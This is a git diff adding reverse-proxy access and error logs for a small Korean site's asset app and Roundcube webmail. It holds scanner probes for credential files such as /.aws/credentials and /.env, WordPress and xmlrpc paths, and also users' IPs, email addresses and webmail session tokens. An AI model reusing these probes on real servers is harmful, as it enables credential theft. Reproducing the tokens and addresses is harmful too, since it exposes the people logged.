"Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:20:10:38 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:20:10:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:20:10:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:20:10:39 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:20:11:17 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 3630] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:20:35:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:35:50 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:20:35:50 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:20:35:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:20:35:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:20:35:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:20:35:50 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:20:35:50 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:20:38:11 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 13153] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" +[18/Feb/2026:21:38:40 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/wp-admin/setup-config.php" [Client 208.84.101.66] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" "-" +[18/Feb/2026:21:38:41 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-admin/setup-config.php" [Client 208.84.101.66] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" "-" +[18/Feb/2026:22:04:18 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 3.147.78.250] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" "-" diff --git a/npm/data/logs/proxy-host-2_error.log b/npm/data/logs/proxy-host-2_error.log index c567d3e..f8dfb88 100644 --- a/npm/data/logs/proxy-host-2_error.log +++ b/npm/data/logs/proxy-host-2_error.log @@ -75,3 +75,5 @@ 2026/02/15 01:55:47 [warn] 506#506: *3933 using uninitialized "server" variable while logging request, client: 2.58.56.62, server: asset.hanmocnn.co.kr 2026/02/16 08:37:39 [warn] 861#861: *34202 using uninitialized "server" variable while logging request, client: 91.224.92.99, server: asset.hanmocnn.co.kr 2026/02/16 09:57:24 [warn] 862#862: *34326 using uninitialized "server" variable while logging request, client: 167.172.221.95, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", host: "asset.hanmocnn.co.kr" +2026/02/17 06:06:06 [warn] 906#906: *42459 using uninitialized "server" variable while logging request, client: 45.94.31.224, server: asset.hanmocnn.co.kr +2026/02/17 18:19:14 [warn] 933#933: *79701 using uninitialized "server" variable while logging request, client: 45.94.31.224, server: asset.hanmocnn.co.kr diff --git a/npm/data/logs/proxy-host-3_access.log b/npm/data/logs/proxy-host-3_access.log index bf517f5..0d7732b 100644 --- a/npm/data/logs/proxy-host-3_access.log +++ b/npm/data/logs/proxy-host-3_access.log @@ -1056,3 +1056,145 @@ [17/Feb/2026:02:25:14 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.aws/credentials" [Client 79.17.16.83] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0" "-" [17/Feb/2026:02:25:15 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.env" [Client 222.157.70.117] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1" "-" [17/Feb/2026:02:25:17 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.svn/wc.db" [Client 197.63.181.91] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0" "-" +[17/Feb/2026:03:23:26 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/31925400925461" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:04:15:42 +0000] - - 301 - POST https mail.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[17/Feb/2026:04:15:43 +0000] - - 301 - POST https mail.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[17/Feb/2026:04:23:52 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/29296462930121" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:05:24:20 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/8775229557005" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:06:24:44 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/26404614411107" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:07:25:11 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/162203037210280" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:08:25:35 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/15000139395299" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:09:25:59 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/123902837915426" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:10:26:22 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/185053078217732" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:11:26:46 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/6578555819323" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:12:13:57 +0000] - - 301 - POST https mail.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr" +[17/Feb/2026:12:13:58 +0000] - - 301 - POST https mail.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr" +[17/Feb/2026:12:27:11 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/2804286426223" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:12:34:36 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:12:34:38 +0000] - 302 302 - POST https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 222.117.41.51] [Length 5] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:12:34:38 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_token=0mmbqQm9Djv5neP59OalzgZIRvu5X4zw" [Client 222.117.41.51] [Length 11621] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:12:34:39 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771331679187" [Client 222.117.41.51] [Length 370] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:12:34:39 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771331679255&_=1771331679186" [Client 222.117.41.51] [Length 3780] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:12:34:46 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13823&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4863] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:12:34:46 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=citecta%40naver.com&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:12:35:02 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13818&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4879] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:12:35:06 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_framed=1&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13818&_mbox=INBOX&_safe=1&_action=preview" [Client 222.117.41.51] [Length 4991] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:12:35:09 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13841&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 7813] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:12:35:09 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=security%40facebookmail.com&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:12:35:11 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_framed=1&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13841&_mbox=INBOX&_safe=1&_action=preview" [Client 222.117.41.51] [Length 8402] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:12:44:52 +0000] - - 301 - GET http mail.hanmocnn.co.kr "/" [Client 167.172.221.95] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://mail.gruasgonzales.com//blog//wp-login.php" +[17/Feb/2026:12:44:53 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/rc//xmlrpc.php?rsd" [Client 167.172.221.95] [Length 27] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://mail.gruasgonzales.com//blog//wp-login.php" +[17/Feb/2026:12:44:53 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/rc//blog/robots.txt" [Client 167.172.221.95] [Length 548] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://mail.gruasgonzales.com//blog//wp-login.php" +[17/Feb/2026:12:44:53 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/rc//blog/" [Client 167.172.221.95] [Length 548] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://mail.gruasgonzales.com//blog//wp-login.php" +[17/Feb/2026:12:44:53 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/rc//wordpress/" [Client 167.172.221.95] [Length 548] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://mail.gruasgonzales.com//blog//wp-login.php" +[17/Feb/2026:12:44:53 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/rc//wp/" [Client 167.172.221.95] [Length 548] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://mail.gruasgonzales.com//blog//wp-login.php" +[17/Feb/2026:13:27:35 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/155841106229467" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:14:28:01 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/21337180706381" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:15:28:23 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/25112267021969" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:16:28:48 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/354784396374" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:17:29:13 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/315722950220654" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:18:29:36 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/259151616618584" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:19:29:58 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/20871894712564" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:21:30:48 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/8218176617090" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[17/Feb/2026:21:47:49 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:47:51 +0000] - 302 302 - POST https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 222.117.41.51] [Length 5] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:47:52 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_token=rtyENB3Dp81XRcl7fPkShs90syWvLkG4" [Client 222.117.41.51] [Length 11620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:47:52 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771364872172" [Client 222.117.41.51] [Length 370] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:47:52 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771364872230&_=1771364872171" [Client 222.117.41.51] [Length 3780] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:47:56 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=Junk&_page=1&_remote=1&_unlock=loading1771364876458&_=1771364872173" [Client 222.117.41.51] [Length 2196] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:48:02 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=44&_mbox=Junk&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4617] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:48:02 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=windpacer%40hanmocnn.co.kr&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:48:25 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 385] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:48:27 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=Trash&_page=1&_remote=1&_unlock=loading1771364907352&_=1771364872174" [Client 222.117.41.51] [Length 4010] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:48:52 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=delete" [Client 222.117.41.51] [Length 373] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:48:52 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 320] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:48:56 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX%2F%26swDJxKzEyAQ-&_page=1&_remote=1&_unlock=loading1771364936348&_=1771364872175" [Client 222.117.41.51] [Length 2486] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:49:52 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 155] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:50:52 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 153] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:51:52 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 153] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:52:16 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_mbox=INBOX%2F%26swDJxKzEyAQ-" [Client 222.117.41.51] [Length 11681] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" +[17/Feb/2026:21:52:17 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX%2F%26swDJxKzEyAQ-&_page=&_remote=1&_unlock=loading1771365137087&_=1771365137041" [Client 222.117.41.51] [Length 2002] 